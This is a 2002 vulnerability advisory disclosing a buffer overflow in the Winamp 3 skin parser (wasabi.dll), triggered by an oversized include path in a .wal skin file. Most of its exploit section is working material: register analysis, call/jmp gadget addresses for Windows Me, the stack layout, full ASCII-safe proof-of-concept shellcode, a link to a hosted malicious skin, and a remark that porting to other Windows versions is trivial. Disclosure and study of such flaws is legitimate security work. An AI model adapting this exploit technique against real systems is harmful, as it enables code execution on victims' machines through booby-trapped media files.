[ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Winamp 3 (1.0.0.488) XML parser buffer overflow
vulnerability
Application: Winamp 3 1.0.0.488
Homepage: www.winamp.com
Impact: There is a buffer overflow inside XML parser DLL that
can cause execution of arbitrary code.
Platform: All x86 win32, not tested on x86 Linux
Date: 29.9.2002
Tested on: Windows Me (4.90)
Discovered by: Sunnis
Mail me @: annihilator@inet.hr
======[ Overview
Winamp is (as we all know), the most popular MP3 player for Windows.
Winamp 3 is a revolutionary succesor of Winamp 2.xx having many new
features, such as a new skinning system.
======[ Problem
Winamp 3 skin files are *.WAL and are automatically opened by MSIE. They
are actually ZIP files with altered extension. They contain pictures and
configuration files used by wsabi (Winamp skinning system).
Wsabi engine is implemented inside wasabi.dll and is designed to provide
very configurable, OS-independant system for building skinnable
applications, quickly and easily (that's the reason why wsabi.dll is 800K
big).
A buffer overflow inside wsabi.dll may occur if <include file="PATH"/>
tag is altered with extremely huge value for file PATH (btw, MAX_PATH on
win32 is defined to be only 512B). This can allow the execution of
arbitrary code inside the address space of Winamp. Wsabi filters most non-
printable characters but specially designed shellcode will still pass
through.
======[ Exploit
By writing an extremely long string of 'A' chars and setting the kerenl-
mode debugger to capture page faults, one can see that at the point of
execution, both EAX and EBX contain pointers to [OverwrittenEIP-4]. ESP is
unusable since it points to some strange value.
Winamp3 exe (studio.exe) loads many system DLLs wich contain some usable
instructions:
jmp eax
jmp ebx
call eax
call ebx
On Windows Me there is such on 0x736D2120 (we can't use some of the
Winamp's modules since their ASCII imagebase representation is NOT
considered to be valid (between 0x20 and 0x7F) by Wsabi and will trigger
an error message).
Stack would look like this:
['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode]
^^^^-address contained inside EAX and EBX
Sample proof of concept shellcode would look like this:
; ASCII opcode representation:
jmp __skip ; ë+
db 0, 0
dd 736D2120h <- call eax
db 25h dup ('A') ; needed because of JMP
__skip: mov eax, 39406567h ; ¸ge@
sub eax, 794c2421h ; -!$Ly
push eax ; P
pop ecx ; Y
; eax = bff44146 = USER32!MessageBoxA on winMe
push 'aaaa' ; haaaa
pop eax ; X
xor eax, 'aaaa' ; 5aaa
; eax = 0
push eax ; P = NULL-terminator
push "tiol" ; hloit
push "pxe " ; h exp
push "tpec" ; hcept
push "noc-" ; h-con
push "fo-f" ; hf-of
push "oorp" ; hproo
push " 3pm" ; hmp3
push "aniW" ; hWina
push esp ; T
pop edx ; Z
; edx = ptr to string
push eax ; P
push eax ; P
push edx ; R
push eax ; P
push ebx ; S = return address
push eax ; Q = user32!MessageBoxA (v. 4.90.3000)
retn ; Ă
Filtering chars doesn't provide any protection at all. Writing
alphanumeric shellcode using specialized kits such as irx's ASC is even
easier.
You can try this one here: kamikaza.ffk.hr/advisory/default.wal
It works on WinMe (4.90) only, but adaptation on other win32s is trivial.
======[ Greetz
Greets go to all members of IIL (http://www.ii-labs.tk): BoyScout,
DownBload, Fr1c, h4z4rd, StYx and (in no specific order): Elrond,
harlequin, St0rm, Megaquad, Dark-igor, bila, phreax, Defiant and everyone
else i forgot.
